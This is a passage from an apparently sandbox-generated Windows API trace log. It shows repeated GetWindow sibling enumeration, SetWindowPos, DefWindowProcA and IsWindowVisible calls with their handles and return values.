returned 0x7013a [0057.601] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.601] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.601] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.601] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.601] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.601] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.601] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.601] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.602] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.602] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.602] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.602] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.602] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.602] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.602] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.602] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.602] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.602] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.602] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.602] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.602] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.602] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.602] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.602] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.602] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.602] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.602] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.602] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.602] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.602] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.602] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.602] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.602] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.603] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.603] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.603] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.603] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.603] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.603] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.603] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.603] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.603] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.603] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.603] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.603] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.603] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.603] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.603] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.603] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.603] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.603] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.603] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.603] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.603] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.603] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.603] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.603] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.604] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.604] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.604] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.604] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.604] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.604] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.604] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.604] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.604] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.604] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.604] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.604] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.604] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.604] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.604] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.604] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.604] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.604] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.604] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.604] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.604] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.604] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.604] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.604] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.604] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.604] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.604] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.604] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.604] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.605] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.605] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.605] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.605] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.605] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.605] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.605] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.605] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.605] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.605] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.605] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.605] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.605] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.605] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.605] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.605] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.605] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.605] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.605] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.605] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.605] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.605] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.605] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.605] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.605] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.605] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.605] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.605] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.605] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.605] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.605] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.606] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.606] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.606] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.606] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.606] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.606] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.606] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.606] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.606] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.606] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.606] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.606] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.606] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.606] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.606] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.606] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.606] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.606] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.606] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.606] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.606] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.606] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.606] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.606] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.606] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.606] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.606] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.606] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.606] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.606] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.606] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.606] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.607] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.607] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.607] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.607] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.607] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.607] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.607] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.607] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.607] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.607] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.607] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.607] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.607] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.607] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.607] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.607] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.607] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.607] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.607] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.607] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.607] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.607] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.607] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.607] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.607] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.607] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.607] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.607] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.607] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.607] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.607] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.608] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.608] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.608] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.608] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.608] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.608] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.608] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.608] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.608] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.608] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.608] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.608] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.608] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.608] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.608] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.608] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.608] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.608] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.608] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.608] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.608] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.608] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.608] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.608] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.608] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.608] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.608] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.608] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.608] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.609] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.609] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.609] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.609] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.609] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.609] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.609] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.609] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.609] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.609] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.609] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.609] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.609] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.609] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.609] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.609] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.609] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.609] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.609] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.609] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.609] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.609] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.609] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.609] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.609] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.609] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.609] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.610] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.610] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.610] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.610] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.610] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.610] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.610] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.610] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.610] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.610] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.610] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.610] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.610] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.610] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.610] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.610] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.610] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.610] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.610] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.610] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.610] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.610] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.610] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.610] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.611] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.611] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.611] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.611] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.611] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.611] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.611] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.611] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.611] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.611] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.611] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.611] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.611] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.611] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.611] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.611] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.611] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.611] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.611] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.611] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.611] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.611] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.611] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.611] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.611] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.611] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.612] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.612] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.612] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.612] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.612] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.612] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.612] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.612] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.612] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.612] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.612] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.612] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.612] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.612] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.612] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.612] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.612] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.612] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.612] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.612] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.612] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.612] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.612] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.612] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.613] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.613] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.613] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.613] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.613] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.613] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.613] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.613] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.613] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.613] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.613] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.613] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.613] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.613] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.613] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.613] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.613] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.613] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.613] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.613] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.613] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.613] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.613] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.613] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.613] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.613] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.613] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.614] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.614] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.614] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.614] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.614] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.614] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.614] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.614] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.614] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.614] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.614] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.614] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.614] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.614] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.614] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.614] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.614] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.614] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.614] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.614] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.614] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.614] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.614] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.614] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.614] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.614] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.614] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.614] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.614] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.614] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.614] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.614] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.615] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.615] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.615] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.615] GetWindow (hWnd=0x1017a, 